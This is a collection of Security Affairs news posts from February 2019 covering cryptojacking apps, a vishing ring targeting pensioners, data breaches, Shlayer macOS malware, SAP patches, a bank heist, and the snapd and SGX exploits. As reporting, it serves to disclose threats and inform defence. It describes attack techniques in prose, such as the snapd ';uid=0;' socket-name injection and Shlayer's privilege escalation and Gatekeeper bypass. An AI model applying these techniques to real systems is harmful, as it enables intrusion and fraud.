Symantec discovered eight potentially unwanted applications (PUAs) into the Microsoft Store that were dropping cryptojacking Coinhive miners.

Security experts at Symantec have discovered eight potentially unwanted applications (PUAs) into the Microsoft Store that were dropping cryptojacking Coinhive miners.

The removed apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

Cryptojacking apps

The malicious Monero (XMR) Coinhivecryptomining scripts were delivered leveraging the Google’s legitimate Google Tag Manager (GTM) library.

The GTM tag management system allows developers to inject JavaScript and HTML content within their apps for tracking and analytics purposes.

“Users may get introduced to these apps through the top free apps lists on the Microsoft Store or through keyword search. The samples we found run on Windows 10, including Windows 10 S Mode.” reads the analysis published by Symantec.

“As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators.”

The malicious apps were added to the Microsoft Store between April and December 2018.

Unlike Google Play, Microsoft Store doesn’t share information on the number of downloads installed on numerous devices, but experts pointed out that the apps have a large number of fake ratings, there were almost 1,900 ratings posted for these applications.

Once one of the apps is downloaded and launched, it fetches a cryptojacking JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. Then the mining script is activated and starts abusing devices resources to mine Monero cryptocurrency.

After snooping on the network traffic between the apps and their command-and-control servers, Symantec was able to find out that they were using a variant of the JavaScript-based Coinhive miner script, a well-known tool used by threat actors as part of cryptojacking campaigns since September 2017 when it was launched.

The analysis of the network traffic associated with the apps allowed the researchers to find the hosting server for each app. All the servers have the same origin, the apps were likely published by the same developers under different names.

Symantec provided the following recommendations to mitigate the threat:

  • Keep your software up to date.
  • Do not download apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by apps.
  • Pay close attention to CPU and memory usage of your computer or device.
  • Install a suitable security app, such as Norton or Symantec Endpoint Protection, to protect your device and data.
  • Make frequent backups of important data.

Pierluigi Paganini

(SecurityAffairs – cryptojacking Coinhive miners, malware)

The post Cryptojacking Coinhive Miners for the first time found on the Microsoft Store appeared first on Security Affairs.

Moscow police department operatives, with the participation of Group-IB experts, took down a group of phone scammers who for several years have been extorting money from the elderly.

Phone scammers typically managed to steal between 450 and 4500 USD per victim, promising substantial compensation for their purchases of medicines, medical devices or dietary supplements. According to the investigation, in just 7 situations of fraudulent events in the investigation, the damage is estimated to be 150 000 USD, and the police believe that the number of victims is much higher.

At the end of 2018, employees of the Moscow Department of Internal Affairs came across the trail of a group of telephone scammers who had long been involved in fraud, extracting large sums of money from Russian elderly people. The money was used to purchase real estate, cars, collectors’ coins, jewelleryand securities. According to the investigation, the scheme was invented and conducted by a 35-year-old resident of Domodedovo originally from the Republic of Azerbaijan. In addition to the leader, the group was made up of “callers” who communicated with pensioners over the phone, “cashiers” who controlled transactions, “money mules” who withdrew cash from ATMs, and even a dedicated person responsible for the relevance and security of the database of phone numbers of potential victims.

Where did the phone scammers get
this data from? They profited from a scam, popular some time before, which sold
“magic pills” — counterfeit drugs and dietary supplements purported
to cure even serious chronic diseases. This scam’s elderly victims spent
hundreds and thousands of dollars on the products, borrowing from friends and
taking loans. The database of these names, phone numbers and the cost of the
“drugs” ordered was in the hands of phone scammers. According to Group-IB
experts, the list held the names of about 1,500 pensioners, their phone
numbers, and the names and prices of the medicines they trustingly purchased.
Judging by the database, these potential victims were between the ages of 70
and 84, and were from Moscow, Rostov, Tomsk, Nizhny Novgorod, Leningrad,
Chelyabinsk, Orenburg and other regions. They had at different times bought
expensive drugs, including: “Weian capsules” (2287 USD), “Flollrode aqueous”
(1600 USD), “Miracle patches” (313 USD), applicators (170 USD), “Lun
Jiang” (157 USD), and “Black nut” (388 USD). 

For those who were suspicious of
the compensation process, the “prosecutor of Moscow” offered to clarify the
information from the “head of the financial department of a bank” clarify the
information. After that, the victim was contacted by another person — “a
representative of a credit and financial organization” — who confirmed his
willingness to transfer compensation to the pensioner’s account or to transfer
the money in cash. When the victim agreed, “tax officers” entered
into negotiations and reported that the victim needed to make an advance
payment of 15% of the compensation as a tax. In addition, the scammers were
able to collect an “insurance premium” or “lawyer’s tax”.

For example, one of the pensioners, who was promised a compensation of 8660 USD,
was required to pay a tax of 747 USD. In another case, a request for
compensation of 448 USD was made for the receipt of 4480 USD. One of the
victims was a famous opera singer who paid the scammers about 4480 USD. The elderly
people transferred the money to the cards of cashiers — “drops” or
“money mules” — indicated by the attackers, who then withdrew the
money from ATMs. 

“Despite the fact that vishing (voice phishing) is a rather old type of phone fraud, it maintains popular to the fact that attackers come up with new methods of deception, targeted at the most vulnerable segments of the population — pensioners, — highlights Sergey  Lupanin, Head of the Group-IB Investigation Department. For years, deceived elderly people have repeatedly complained about telephone scams to the Russian Central Bank, the Ministry of Finance and the Prosecutor’s Office, and regulatory and law enforcement agencies have periodically issued warnings about these dangerous and very cynical fraudulent schemes, but the number of victims did not decrease. The scammers not only maintained secrecy but also improved their methods of social engineering: they quickly gained their victims’ trust, showed themselves to be intelligent and educated, and were persistent and aggressive. It’s rare for one of their victims to escape unscathed.”

phone scammers
Source: The Express

However, as the result of a large-scale police operation, the organized criminal group was defeated: on 5 February, several detentions and searches were carried out at the criminals’ place of residence. A police search of the apartment of the scheme’s organizer turned up large sums of money in roubles and other currencies, bank cards, a traumatic gun, a hunting rifle and collectible coins. The scammer invested the money received in shares of Russian companies. In his stash inside a toilet, field investigators found database printouts with names of pensioners as well as extracts with phone numbers and names of victims that the criminal’s girlfriend had tried to flush. In a private house belonging to another detainee — the leader of the money mules — a police search turned up bank cards, databases of pensioners, accounting of criminal activity, money, and jewellery.

A total of seven people were detained. According to the investigation, the damages from 7 episodes of fraud are estimated at 150 000 USD, but operatives believe that the number of victims is much higher — at least 30 people. An investigation is underway.

About the author: Group-IB Group-IB is one of the leading providers of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – phone scammers, cybercrime)

The post Group-IB helped to arrest phone scammers profiting off the backs of the Russian elderly appeared first on Security Affairs.

The week closes with the news of another embarrassing data breach, the Coffee Meets Bagel confirmed a hack on Valentine’s Day.

The dating app Coffee Meets Bagel confirmed that hackers breached its systems on Valentine’s Day and may have obtained access to users’ account data.

The company notified the incident to account holders, the intrusion was discovered after an archive containing user data was offered for sale on the dark web for roughly $20,000 worth of Bitcoin,

Early this week, the Register revealed in exclusive that some 617 million online account details stolen from 16 hacked websites are available for sale on the dark web. Coffee Meets Bagel learned of the incident on Feb. 11, 2019.

The advertising for the sale of the huge trove of data was published in the popular Dream Market black marketplace, data are available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites are known to have been hacked (i.e. MyHeritage, MyFitnessPal) for some of them, including Coffee Meets Bagel, it is the first time that the security community was informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legit. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

The Register report alleges that data belonging to 6.17 million Coffee Meets Bagel accounts (673 MB of data) were offered for sale. Data appears to be related to late 2017 and mid-2018.

“As always, we recommend you take extra caution against any unsolicited communications that ask you for your personal data or refer you to a web page asking for personal data,” reads the email sent to the users. “We also recommend avoiding clicking on links or downloading attachments from suspicious emails.” reads an email sent by the company to the users.

Stolen records include name, email address, age, registration date, and gender, but data breach notification issued by Coffee Meets Bagel only reports that names and email addresses prior to May 2018 were exposed.

According to the company, no financial data were exposed because the company doesn’t store it.

Coffee Meets Bagel hired a forensic firm to investigate the incident and assess its systems, at the time it is not clear how hackers have breached the company, it also started the audit of vendor and external systems.

Pierluigi Paganini

(SecurityAffairs – Coffee Meets Bagel, hacking)

The post Coffee Meets Bagel dating app confirms data breach appeared first on Security Affairs.

Germany announced it is going to make its cyber capabilities available for the NATO alliance to help fight hacking and electronic warfare.

Germany is going to share its cyber warfare capabilities with the NATO alliance to protect members of the alliance against hacking and electronic warfare.

During the 2016 Warsaw Summit, NATO officially recognised cyberspace as a military operational domain. This means that the NATO alliance will respond with conventional weapons in case of a severe cyber attack confirming that the Internet is a new battlefield.
Each Ally is committed to improving its resilience to cyber attacks and the ability to promptly respond to cyber attacks, including in hybrid contexts. The Alliance aims to expand the scope of the NATO Cyber Range to allow allies in improving cyber capabilities and information sharing on threat and best practices.

NATO fears both nation-state hacking and attacks carried out by cyber criminals, their activities are becoming even more intense and urge a proper response from the alliance.

“NATO has designated cyberspace as a conflict domain alongside land, sea and air and says electronic attacks by the likes of Russia and China — but also criminals and so-called “hacktivists” — are becoming more frequent and more destructive.” reads a post published by AFP press.

NATO alliance

During a meeting of defence ministers held in Brussels on Thursday, Germany told allies that it would make both its defensive and offensive cyber capabilities available.

“Just as we provide army, air force and naval forces to NATO, we are now also in a position to provide NATO capabilities on the issue of cyber within the national and legal framework that we have,” German Defence Minister Ursula von der Leyen said.

Germany is not alone, the US, Britain, Denmark, the Netherlands and Estonia have all announced the availability of their offensive cyber capabilities to the alliance.

NATO members hope that the announcement of the sharing for offensive capabilities would work as a deterrent for threat actors.

Members of the alliance that already share conventional military means, aims to share their cyber capabilities for NATO missions and operations.

Potential targets of these operations can include any connected system, ranging from computers and mobile devices, to ICS systems in critical infrastructure.

“In a sign of the growing importance NATO countries attach to the cyber battlefield, this year Britain said it would spend 65 million pounds (74 million euros/$83 million) on offensive capabilities.” concludes AFP.

Pierluigi Paganini

(SecurityAffairs – NATO alliance, Germany)

The post Germany makes its cyber capabilities available for NATO alliance appeared first on Security Affairs.

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets MacOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update it was distributed through a large number of websites, fake or compromised legitimate domains.

Shlayer macOS Malware

“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation, experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The script in base64 is decoded and AES decrypted revealing a second script that contains another encoded script that is subsequently executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script attempts to download the password-protected ZIP file using curl, and creates a directory in /tmp to store the ZIP file and unzip it. 

The script also makes the binary within the unzipped .app executable using chmod +x, then it runs the payload using specific arguments, and then performs a killall Terminal to kill the running script’s terminal window.

The second stage malware attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline

“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

With this technique it is possible to run whitelisted software without user intervention even if the system is set to disallow unknown applications downloaded from the internet. 

Carbon Black’s analysis includes Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Experts spotted a new strain of Shlayer macOS Malware appeared first on Security Affairs.

SAP released a collection of security fixes for February 2019 that address 13 vulnerabilities in its products, including a Hot News flaw in SAP HANA XSA.

This week SAP addressed 13 vulnerabilities in its products with the released of the February 2019 set of security fixes, including a Hot News flaw in SAP HANA Extended Application Services (XSA), advanced model.

SAP Security Patch Day for February 2019 includes 13 Security Notes and 3 updates to previously released security notes. 2 Notes are rated Hot News, 4 rated High priority, and 10 rated Medium priority.

“On 12th of February 2019, SAP Security Patch Day saw the release of 13 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

The fixes address flaw in the following SAP products: Business Client, HANA XSA, ABAP Platform (SLD Registration), Disclosure Management, Solution Tools Plug-In (ST-PI), Note Assistant, Business Objects, Manufacturing Integration and Intelligence, Business One Mobile Android App, and WebIntelligence BILaunchPad (Enterprise).

The most severe issue is a Hot News Notes (CVSS score of 9.8) that updates a Security Note released on April 2018 Patch Day and that includes security updates for the browser control Chromium delivered with SAP Business Client. 

“As mentioned, one of the two SAP Security Notes tagged as HotNews (#2742027) affects SAP HANA XSA (the other one is #2622660 that is regularly updated with Chromium security updates and was explained in a previous blog post). It is a classic Missing Authorization Check that may allow an attacker not only to read/modify/delete sensitive information, but also to gain high-privileged functionalities.” reads the analysis published by Onapsys.

“It affects XS Advanced selected versions in both SAP HANA 1 and SAP HANA 2 and can be patched by upgrading the XS Advanced component.”

The security updates include a Hot News Note for HANA XSA that addresses a missing authentication check that could be exploited by an attacker to gain access to high-privileged functionalities, including the ability to be able to read, modify, or delete sensitive information. 

The security vulnerability affects XS Advanced selected versions in SAP HANA 1 and SAP HANA 2.

To address the flaw, customers should upgrade the XS Advanced component. SAP also provided a workaround that consists of disabling the component, if not in use. 

The SAP Security Patch Day for February 2019 also addressed another issue in SAP HANA XSA that could lead Information Disclosure, it was rated Medium severity (CVSS score of 6.8). 

SAP addressed several High priority Security Notes including an XML External Entity (XXE) vulnerability in SLD Registration of ABAP Platform, Missing Authorization check in Disclosure Management, and access to Easy Access Menu in ABAP Platform. 

SAP also issued an update to a security note released on November 2014 Patch Day, a potential information disclosure relating to database server file system.

Below there is a summary, published by Onapsis, of the type of vulnerabilities that were addressed in February, including another six that were published in late January, after that month’s Security Notes Patch Day.

SAP HANA february

Pierluigi Paganini

(SecurityAffairs – SAP HANA, security)

The post SAP security fixes address Critical flaw in SAP HANA XSA appeared first on Security Affairs.

Bank of Valletta, the largest bank of Malta was hit by a cyber attack, attackers attempted to steal 13 million euros ($14.7 million).

Bank of Valletta the largest bank in Malta that accounts for almost half of banking transactions in the country, had to shut down its operations on Wednesday after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat, hackers broke into the systems of the bank and transfer the funds overseas.
Muscat told parliament that threat actors attempted to transfer funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

“The reason for my statement is to put people’s minds at rest that their money is safe in the bank,” Muscat insisted, adding that BOV was an important cog for the Maltese economy.”

“It is no joke having a bank that controls half the economy shut down for a whole business day but at this stage caution trumped every other consideration,”

Bank of Valletta

The Government of Malta is the largest shareholder of the Bank of Valletta, the financial institution shut down its systems, closed branches and ATMs, and suspended mobile and Internet banking and internal email.

After the disclosure of the attack, the website of the bank also went offline.

“Prime Minister Joseph Muscat told parliament the cyber attack involved the creation of false international payments totaling 13 million euros ($14.7 million) to banks in Britain, the United States, the Czech Republic and Hong Kong.” reported the Reuters.

“The funds have been traced and the Bank of Valletta is seeking to have the fraudulent transactions reversed.”

The customer accounts were not affected and the services will be restored as soon as possible.

The authorities were able to trace the transactions and reverse them.

The Bank is working with local and international police authorities to investigate in the case.

During routine reconciliations that the Bank carries out regularly it was noticed that there were discrepancies in eleven payments having a total value of around EUR 13 million emanating from the Bank’s foreign payment accounts.  The Bank took immediate steps to address this issue by requesting the international banks involved to stop these payments,” the bank said in a statement reported by MaltaToday.

Pierluigi Paganini

(SecurityAffairs – Bank of Valletta, hacking)

The post Bank of Valletta shut down its operations after a cyber attack appeared first on Security Affairs.

Experts at ACROS Security’s 0patch released an unofficial patch for a recently disclosed remote code execution vulnerability in the Apache OpenOffice suite.

ACROS Security’s 0patch released an unofficial patch for a path traversal flaw recently disclosed in the Apache OpenOffice suite.

The security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file embedding an event embedded.

“I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog.” reads the blog post published by Inführ.

The flaw could have a huge impact because the popular free, open source office suite is used by millions of Windows, MacOS and Linux users.

Libre Office OpenOffice

The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseoverevent to a link included in the ODT file.

Inführ devised an attack that relies on exploiting a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting the vulnerability it is possible to trigger the automatic execution of a specific python library included in the suite using a hidden onmouseover event.

Even if OpenOffice developers still haven’t released a fix for the issue, 0patch experts have released an unofficial patch to address this flaw. The micropatch can be applied to the latest version of OpenOffice for Windows.

Researchers also released patches for LibreOffice as well.

0patch also published a video PoC that shows the exploitation of the vulnerability.

This is the second time in a few days that 0patch released an unofficial patch,  this week 0patch experts released a micropatch to address an Adobe Reader zero-day that allows maliciously PDF docs to call home and send over the victim’s NTLM hash.

Pierluigi Paganini

(SecurityAffairs – micropatch, hacking)

The post 0patch released micropatch for code execution flaw in OpenOffice appeared first on Security Affairs.

Expert discovered a privilege escalation vulnerability in default installations of Ubuntu Linux that resides in the snapd API.

Security researcher Chris Moberly discovered a vulnerability in the REST API for Canonical’s snapd daemon that could allow attackers to gain root access on Linux machines.

Canonical, the makers of Ubuntu Linux, promotes their “Snap” packages to roll all application dependencies into a single binary (similar to Windows applications).

The Snap environment includes an “app store” where developers can contribute and maintain ready-to-go packages.

“Management of locally installed snaps and communication with this online store are partially handled by a systemd service called “snapd”.”

The flaw called ‘Dirty_Sock’ would affect affects several Linux servers, the expert successfully tested on Ubuntu and released PoCs to show how to elevate privileges.

“In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.” wrote the expert.

“Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.”

“Both are effective on default installations of Ubuntu.”

Canonical has already addressed the flaw, administrators need to install the snapd update to avoid the exploitation.

“Chris Moberly discovered that snapd versions 2.28 through 2.37 incorrectly validated and parsed the remote socket address when performing access controls on its UNIX socket.” reads the security advisory published by Canonical.

“A local attacker could use this to access privileged socket APIs and obtain administrator privileges. On Ubuntu systems with snaps installed, snapd typically will have already automatically refreshed itself to snapd 2.37.1 which is unaffected.”

Moberly discovered that the daemon leverages UNIX sockets to allow developers to communicate with it using a REST API.

This UNIX socket runs under the security context of the root user, so the expert investigated the possibility to elevate his privileges by abusing API methods.

The researcher discovered that it is possible to create a local user account using the daemon’s “POST /v2/create-user” API. This API command requires the program to have root permission to create a user.

The analysis of snapd connections allowed the expert to discover that if a user has root permissions, it uses a string composed of the calling pid, uid of the program connected to the socket, the socket path, and the remoteAdd (i.e. “pid=5127;uid=1000;socket=/run/snapd.socket;@”).

Where the @ substring represents the RemoteAddr of the socket, or the socket name that is used to connect to the snapd socket.

Moberly created a socket containing ;uid=0; in its name in a way to trick the parser to overwrite the uid when the string is analyzed.

snapd socket-via-remote-socket

Parsing a string containing the uid=0 is the last part will allow overwriting the previous uid and trick snapd into emulating a root user and allow a local user to be created.

The expert published the “dirty_sockv1” PoC code for this attack, but he pointed out that the attack required an Internet connection and the creation of an account on the Ubuntu SSO and uploading an SSH public key to your profile.

The expert also devised a Dirty_Sock version 2 that sees sideloads a malicious snap using the ‘POST /v2/snaps’ API instead.

dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all.” continues the expert.

“HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service.”

The Dirty_Sock version 2 requires no Internet connection or the use of SSH key.

Canonical fixed the issue with the release of the 2.37.1. version that implements a stricter parser that removes user-controlled variable.

Pierluigi Paganini

(SecurityAffairs – Snapd, Ubuntu)

The post Ubuntu snapd flaw allows getting root access to the system. appeared first on Security Affairs.

Researchers devised a new technique to hide malware in the security Intel SGX enclaves, making it impossible to detect by several security technologies.

Security researchers devised a new technique to hide malware in the security Intel SGX enclaves. Intel Software Guard eXtensions (SGX) is a technology for application developers that allows protecting select code and data from disclosure or modification. The Intel SGX allows application code executing within an Intel SGX enclave, which are protected areas of execution in memory.

The technique created by the experts allows them to deploy a malicious code in a memory area that is protected by design making it hard the detection.

Enclaves are designed to be protected from processes running at higher privilege levels, including the operating system, kernel, BIOS, SMM, hypervisor.

The team of researchers composed of Michael Schwarz, Samuel Weiser and Daniel Gruss of the Graz University of Technology in Austria, includes those that discovered the Spectre-Meltdown CPU vulnerabilities. They devised a method to bypass security protection and implant malware in the enclaves leveraging a benign application that uses a malicious enclave when executed.

Experts pointed out that the host application communicates with the enclave through an interface that should not allow the enclave to attack the app.

The researchers used Transactional Synchronization eXtensions (TSX), in modern Intel CPUs along with a fault-resistant read primitive technique called TSX-based Address Probing (TAP).

“Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer.” states the research paper published by the experts.

“We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

The experts developed a fault-resistant write primitive, Checking Located Addresses for Writability (CLAW) to determine whether it is possible to write in a memory page.

The primitive encapsulates the write instruction for the specific memory page within a TSX transaction and aborts the transaction just after the write operation.

The experts determine the possibility to write in a target memory page analyzing the return value of the transaction.

A malware injected in the enclaves could be transparent to security solutions, including Address Space Layout Randomization (ASLR), stack canaries, and address sanitizer.

“The strong confidentiality and integrity guarantees of SGX fundamentally prohibit malware inspection and analysis, when running such malware within an enclave.” continues the analysis.

“Moreover, there’s a potential threat of next-generation ransomware which securely keeps encryption keys inside the enclave and, if implemented correctly, prevents ransomware recovery tools,” the academics explain.

Intel SGX enclaves

The experts published a proof-of-concept exploit that bypassed ASLR, stack canaries, and address sanitizer, the overall exploit process took only 20.8 seconds. Hardware and software mitigations against this new attack will be implemented by Inter in future generations of CPUs.

“With SGX-ROP, we bypassed ASLR, stack canaries, and address sanitizer, to run ROP gadgets in the host context enabling practical enclave malware.” conclude the researchers.

“We conclude that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits.”

Pierluigi Paganini

(SecurityAffairs – SGX enclaves, hacking)

The post Experts found a way to create a super-malware implanted in SGX-enclaves appeared first on Security Affairs.